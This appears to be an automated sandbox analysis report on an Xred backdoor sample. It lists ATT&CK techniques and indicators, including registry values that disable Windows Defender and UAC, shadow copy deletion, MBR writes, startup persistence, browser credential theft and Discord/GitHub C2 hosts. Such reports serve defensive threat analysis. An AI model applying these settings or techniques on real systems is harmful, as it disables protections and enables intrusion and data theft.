xred | 68178b1f58efb2930e9153ec8697f09bc35bc479314adb0db8f199e0016fe749

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	systemservice92.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 2 IoCs

defense_evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe

UAC bypass 3 TTPs 6 IoCs

defense_evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	powershell.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	powershell.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	reg.exe

Xred
Xred is backdoor written in Delphi.
backdoor xred
Xred family
xred
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
2052	bcdedit.exe
4120	bcdedit.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3172	powershell.exe
4844	powershell.exe
5540	powershell.exe
5272	powershell.exe
1348	powershell.exe
5612	powershell.exe
5256	powershell.exe
3188	powershell.exe
3544	powershell.exe
1600	powershell.exe
4492	powershell.exe
5444	powershell.exe
3188	powershell.exe
1600	powershell.exe

Disables RegEdit via registry modification 1 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	reg.exe

Disables Task Manager via registry modification
defense_evasion

Disables cmd.exe use via registry modification 2 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1"	systemservice92.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	systemservice92.exe

Possible privilege escalation attempt 9 IoCs

exploit

pid	Process
1660	icacls.exe
4348	icacls.exe
5956	icacls.exe
5268	icacls.exe
6260	icacls.exe
2252	icacls.exe
4960	icacls.exe
5712	icacls.exe
6452	takeown.exe

Drops startup file 8 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\systemservice92.exe	systemservice92.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\systemservice92.exe	systemservice92.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qs6rou5u1z2gnhw7.exe	final.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qs6rou5u1z2gnhw7.exe	final.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\i3x0h9xv12hs1m1i.exe	final.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\i3x0h9xv12hs1m1i.exe	final.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\08j0ajwl1pwmfrtm.exe	systemservice92.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\08j0ajwl1pwmfrtm.exe	systemservice92.exe

Executes dropped EXE 12 IoCs

pid	Process
2100	final.exe
2356	final.exe
4636	systemservice92.exe
7124	systemservice92.exe
1076	final.exe
300	final.exe
6516	ic8Ruq4f3P9sRPW.exe
5124	venus.exe
5288	Blueman.exe
5024	._cache_Blueman.exe
6692	Synaptics.exe
828	._cache_Synaptics.exe

Impair Defenses: Safe Mode Boot 1 TTPs 1 IoCs

Safe Mode Boot

T1562.009

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Minimal	systemservice92.exe

Loads dropped DLL 64 IoCs

pid	Process
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe
2356	final.exe

Modifies file permissions 1 TTPs 9 IoCs

File and Directory Permissions Modification

T1222

pid	Process
2252	icacls.exe
4348	icacls.exe
6260	icacls.exe
1660	icacls.exe
4960	icacls.exe
5712	icacls.exe
5956	icacls.exe
5268	icacls.exe
6452	takeown.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe"	Blueman.exe

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File created	C:\$Sys-Manager\desktop.ini	final.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 15 IoCs

Web Service

T1102

flow	ioc
33	discord.com
40	discord.com
41	discord.com
67	discord.com
3	discord.com
3	raw.githubusercontent.com
55	raw.githubusercontent.com
66	raw.githubusercontent.com
44	discord.com
47	raw.githubusercontent.com
31	discord.com
36	discord.com
53	raw.githubusercontent.com
8	discord.com
9	discord.com

Looks up external IP address via web service 7 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
9	ipinfo.io
34	api.ipify.org
35	ipinfo.io
38	api64.ipify.org
1	api64.ipify.org
3	ip-api.com
8	api.ipify.org

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	venus.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\Recovery	ReAgentc.exe
File opened for modification	C:\Windows\system32\Recovery\ReAgent.xml	ReAgentc.exe

Enumerates processes with tasklist 1 TTPs 64 IoCs

Process Discovery

T1057

pid	Process
7120	tasklist.exe
1752	Process not Found
2716	tasklist.exe
5756	tasklist.exe
5736	tasklist.exe
6256	tasklist.exe
6328	tasklist.exe
5644	Process not Found
312	tasklist.exe
1108	tasklist.exe
5148	tasklist.exe
1916	tasklist.exe
1584	tasklist.exe
1808	tasklist.exe
5592	tasklist.exe
1404	tasklist.exe
1788	tasklist.exe
2600	tasklist.exe
5688	tasklist.exe
3108	tasklist.exe
2484	Process not Found
6216	tasklist.exe
7088	tasklist.exe
5824	Process not Found
6676	tasklist.exe
6532	tasklist.exe
2152	tasklist.exe
1756	tasklist.exe
2428	tasklist.exe
3076	tasklist.exe
6948	tasklist.exe
860	tasklist.exe
856	tasklist.exe
6432	tasklist.exe
5420	tasklist.exe
780	tasklist.exe
6540	tasklist.exe
4416	tasklist.exe
3872	tasklist.exe
5128	tasklist.exe
5344	tasklist.exe
6256	tasklist.exe
552	tasklist.exe
5968	tasklist.exe
5360	tasklist.exe
6252	tasklist.exe
5540	tasklist.exe
6840	tasklist.exe
5232	tasklist.exe
5636	Process not Found
5908	tasklist.exe
7044	tasklist.exe
5536	tasklist.exe
1456	tasklist.exe
5164	tasklist.exe
3556	tasklist.exe
6484	tasklist.exe
1368	Process not Found
2908	tasklist.exe
7040	tasklist.exe
5176	tasklist.exe
1260	tasklist.exe
5544	Process not Found
2908	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 4 IoCs

defense_evasion privilege_escalation

Hidden Files and Directories

T1564.001

pid	Process
3908	cmd.exe
2296	cmd.exe
2820	cmd.exe
2604	cmd.exe

Drops file in Windows directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	ReAgentc.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	ReAgentc.exe

Access Token Manipulation: Create Process with Token 1 TTPs 2 IoCs

Create Process with Token

T1134.002

pid	Process
1240	cmd.exe
2024	cmd.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x000500000002a715-548.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2080	5024	Process not Found	1166

System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	venus.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Blueman.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	._cache_Blueman.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Synaptics.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	._cache_Synaptics.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 3 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

Wi-Fi Discovery

T1016.002

pid	Process
5228	netsh.exe
7096	cmd.exe
6928	netsh.exe

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000001d3755855d3e98e80000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800001d3755850000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff0000000007000100006809001d375585000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d1d375585000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000001d37558500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Delays execution with timeout.exe 64 IoCs

pid	Process
4276	timeout.exe
572	timeout.exe
7092	timeout.exe
6936	timeout.exe
1876	timeout.exe
6184	timeout.exe
5680	timeout.exe
1300	timeout.exe
5268	timeout.exe
5956	Process not Found
6020	timeout.exe
2556	timeout.exe
6652	timeout.exe
5136	timeout.exe
5336	timeout.exe
6328	timeout.exe
5796	timeout.exe
2124	timeout.exe
2992	timeout.exe
7096	timeout.exe
5352	timeout.exe
5344	timeout.exe
4976	timeout.exe
940	timeout.exe
1352	timeout.exe
2840	timeout.exe
5164	timeout.exe
3584	timeout.exe
2400	timeout.exe
1208	timeout.exe
5440	timeout.exe
6772	timeout.exe
240	timeout.exe
6128	timeout.exe
7052	timeout.exe
4984	timeout.exe
6296	timeout.exe
6072	Process not Found
5724	timeout.exe
5816	timeout.exe
3500	Process not Found
1708	timeout.exe
1376	timeout.exe
6392	timeout.exe
5908	timeout.exe
7120	timeout.exe
6856	timeout.exe
6096	timeout.exe
6564	timeout.exe
4332	timeout.exe
6020	timeout.exe
2576	timeout.exe
1440	Process not Found
7148	timeout.exe
6412	timeout.exe
6828	timeout.exe
1424	timeout.exe
4088	timeout.exe
5528	timeout.exe
2556	Process not Found
5516	Process not Found
6712	timeout.exe
5084	timeout.exe
2932	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Interacts with shadow copies 3 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
5424	vssadmin.exe

Kills process with taskkill 1 IoCs

pid	Process
2364	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133834138242155673"	chrome.exe

Modifies registry class 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings	systemservice92.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Blueman.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Synaptics.exe

Modifies registry key 1 TTPs 14 IoCs

Modify Registry

pid	Process
1260	reg.exe
4432	reg.exe
3584	reg.exe
3380	reg.exe
6884	reg.exe
6028	reg.exe
7016	reg.exe
7056	reg.exe
1600	reg.exe
3272	reg.exe
2836	reg.exe
332	reg.exe
2820	reg.exe
6092	reg.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\rgbaddon.zip:Zone.Identifier	chrome.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
1440	schtasks.exe
5220	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1420	chrome.exe
1420	chrome.exe
1600	powershell.exe
1600	powershell.exe
4492	powershell.exe
4492	powershell.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe
7124	systemservice92.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1420	chrome.exe
Token: SeCreatePagefilePrivilege	1420	chrome.exe
Token: SeShutdownPrivilege	1420	chrome.exe
Token: SeCreatePagefilePrivilege	1420	chrome.exe
Token: SeShutdownPrivilege	1420	chrome.exe
Token: SeCreatePagefilePrivilege	1420	chrome.exe
Token: SeShutdownPrivilege	1420	chrome.exe
Token: SeCreatePagefilePrivilege	1420	chrome.exe
Token: SeShutdownPrivilege	1420	chrome.exe
Token: SeCreatePagefilePrivilege	1420	chrome.exe
Token: SeShutdownPrivilege	1420	chrome.exe
Token: SeCreatePagefilePrivilege	1420	chrome.exe
Token: SeShutdownPrivilege	1420	chrome.exe
Token: SeCreatePagefilePrivilege	1420	chrome.exe
Token: SeShutdownPrivilege	1420	chrome.exe
Token: SeCreatePagefilePrivilege	1420	chrome.exe
Token: SeShutdownPrivilege	1420	chrome.exe
Token: SeCreatePagefilePrivilege	1420	chrome.exe
Token: SeShutdownPrivilege	1420	chrome.exe
Token: SeCreatePagefilePrivilege	1420	chrome.exe
Token: SeShutdownPrivilege	1420	chrome.exe
Token: SeCreatePagefilePrivilege	1420	chrome.exe
Token: SeShutdownPrivilege	1420	chrome.exe
Token: SeCreatePagefilePrivilege	1420	chrome.exe
Token: SeShutdownPrivilege	1420	chrome.exe
Token: SeCreatePagefilePrivilege	1420	chrome.exe
Token: SeShutdownPrivilege	1420	chrome.exe
Token: SeCreatePagefilePrivilege	1420	chrome.exe
Token: SeShutdownPrivilege	1420	chrome.exe
Token: SeCreatePagefilePrivilege	1420	chrome.exe
Token: SeShutdownPrivilege	1420	chrome.exe
Token: SeCreatePagefilePrivilege	1420	chrome.exe
Token: SeShutdownPrivilege	1420	chrome.exe
Token: SeCreatePagefilePrivilege	1420	chrome.exe
Token: SeShutdownPrivilege	1420	chrome.exe
Token: SeCreatePagefilePrivilege	1420	chrome.exe
Token: SeShutdownPrivilege	1420	chrome.exe
Token: SeCreatePagefilePrivilege	1420	chrome.exe
Token: SeShutdownPrivilege	1420	chrome.exe
Token: SeCreatePagefilePrivilege	1420	chrome.exe
Token: SeShutdownPrivilege	1420	chrome.exe
Token: SeCreatePagefilePrivilege	1420	chrome.exe
Token: SeShutdownPrivilege	1420	chrome.exe
Token: SeCreatePagefilePrivilege	1420	chrome.exe
Token: SeShutdownPrivilege	1420	chrome.exe
Token: SeCreatePagefilePrivilege	1420	chrome.exe
Token: SeShutdownPrivilege	1420	chrome.exe
Token: SeCreatePagefilePrivilege	1420	chrome.exe
Token: SeShutdownPrivilege	1420	chrome.exe
Token: SeCreatePagefilePrivilege	1420	chrome.exe
Token: SeShutdownPrivilege	1420	chrome.exe
Token: SeCreatePagefilePrivilege	1420	chrome.exe
Token: SeShutdownPrivilege	1420	chrome.exe
Token: SeCreatePagefilePrivilege	1420	chrome.exe
Token: SeShutdownPrivilege	1420	chrome.exe
Token: SeCreatePagefilePrivilege	1420	chrome.exe
Token: SeShutdownPrivilege	1420	chrome.exe
Token: SeCreatePagefilePrivilege	1420	chrome.exe
Token: SeShutdownPrivilege	1420	chrome.exe
Token: SeCreatePagefilePrivilege	1420	chrome.exe
Token: SeShutdownPrivilege	1420	chrome.exe
Token: SeCreatePagefilePrivilege	1420	chrome.exe
Token: SeShutdownPrivilege	1420	chrome.exe
Token: SeCreatePagefilePrivilege	1420	chrome.exe

Suspicious use of FindShellTrayWindow 44 IoCs

pid	Process
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe
1420	chrome.exe

Suspicious use of SetWindowsHookEx 18 IoCs

pid	Process
7124	systemservice92.exe
7124	systemservice92.exe
6972	OpenWith.exe
6972	OpenWith.exe
6972	OpenWith.exe
6972	OpenWith.exe
6972	OpenWith.exe
6972	OpenWith.exe
6972	OpenWith.exe
6972	OpenWith.exe
6972	OpenWith.exe
6972	OpenWith.exe
6972	OpenWith.exe
1820	AcroRd32.exe
1820	AcroRd32.exe
1820	AcroRd32.exe
1820	AcroRd32.exe
1820	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1420 wrote to memory of 3996	1420	chrome.exe	82
PID 1420 wrote to memory of 3996	1420	chrome.exe	82
PID 1420 wrote to memory of 4988	1420	chrome.exe	83
PID 1420 wrote to memory of 4988	1420	chrome.exe	83
PID 1420 wrote to memory of 4988	1420	chrome.exe	83
PID 1420 wrote to memory of 4988	1420	chrome.exe	83
PID 1420 wrote to memory of 4988	1420	chrome.exe	83
PID 1420 wrote to memory of 4988	1420	chrome.exe	83
PID 1420 wrote to memory of 4988	1420	chrome.exe	83
PID 1420 wrote to memory of 4988	1420	chrome.exe	83
PID 1420 wrote to memory of 4988	1420	chrome.exe	83
PID 1420 wrote to memory of 4988	1420	chrome.exe	83
PID 1420 wrote to memory of 4988	1420	chrome.exe	83
PID 1420 wrote to memory of 4988	1420	chrome.exe	83
PID 1420 wrote to memory of 4988	1420	chrome.exe	83
PID 1420 wrote to memory of 4988	1420	chrome.exe	83
PID 1420 wrote to memory of 4988	1420	chrome.exe	83
PID 1420 wrote to memory of 4988	1420	chrome.exe	83
PID 1420 wrote to memory of 4988	1420	chrome.exe	83
PID 1420 wrote to memory of 4988	1420	chrome.exe	83
PID 1420 wrote to memory of 4988	1420	chrome.exe	83
PID 1420 wrote to memory of 4988	1420	chrome.exe	83
PID 1420 wrote to memory of 4988	1420	chrome.exe	83
PID 1420 wrote to memory of 4988	1420	chrome.exe	83
PID 1420 wrote to memory of 4988	1420	chrome.exe	83
PID 1420 wrote to memory of 4988	1420	chrome.exe	83
PID 1420 wrote to memory of 4988	1420	chrome.exe	83
PID 1420 wrote to memory of 4988	1420	chrome.exe	83
PID 1420 wrote to memory of 4988	1420	chrome.exe	83
PID 1420 wrote to memory of 4988	1420	chrome.exe	83
PID 1420 wrote to memory of 4988	1420	chrome.exe	83
PID 1420 wrote to memory of 4988	1420	chrome.exe	83
PID 1420 wrote to memory of 1332	1420	chrome.exe	84
PID 1420 wrote to memory of 1332	1420	chrome.exe	84
PID 1420 wrote to memory of 428	1420	chrome.exe	85
PID 1420 wrote to memory of 428	1420	chrome.exe	85
PID 1420 wrote to memory of 428	1420	chrome.exe	85
PID 1420 wrote to memory of 428	1420	chrome.exe	85
PID 1420 wrote to memory of 428	1420	chrome.exe	85
